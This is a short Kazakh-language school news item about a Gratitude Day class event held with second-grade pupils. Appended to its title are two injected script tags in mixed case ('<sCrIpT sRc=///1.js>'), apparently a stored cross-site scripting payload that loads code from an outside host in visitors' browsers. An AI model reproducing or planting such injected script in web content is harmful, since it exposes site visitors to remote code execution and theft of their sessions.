«Алғыстықта шек жоқ» атты сыныптан тыс іс-шара<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

01.03.2023

28 ақпанда 2в сыныбында алғыс айту күніне орай «Алғыстықта шек жоқ» тақырыбында сыныптан тыс іс-шара өтті. Алғыс – біреуге жасаған мейіріміне, ілтипатына ризашылық сезімі.«Алғыс айту» мерекесі ортақ тарихқа негізделген көпұлтты Қазақстанның бірлігін сақтау және дамыту, біріккен қиындықтарды есте сақтау мақсатында енгізілді. Барлық этностардың бір-біріне және қазақ халқына алғысы шексіз. Оқушылар сабаққа қызығушылықпен қатысты. Сабақ «Алғыс айта аламыз ба?»; «Алғыс айтамын» сияқты кезеңдерден құралды. Алғыс сағаты қызықты да әсерлі өтті және екінші сынып оқушылары үшін мейірімділіктің, достықтың, барша қазақстандықтардың бір-біріне деген сүйіспеншілігінің жарқын мерекесі болды.

Просмотров: 441


Пікір қосу



Деректерді қолтаңбаға қосу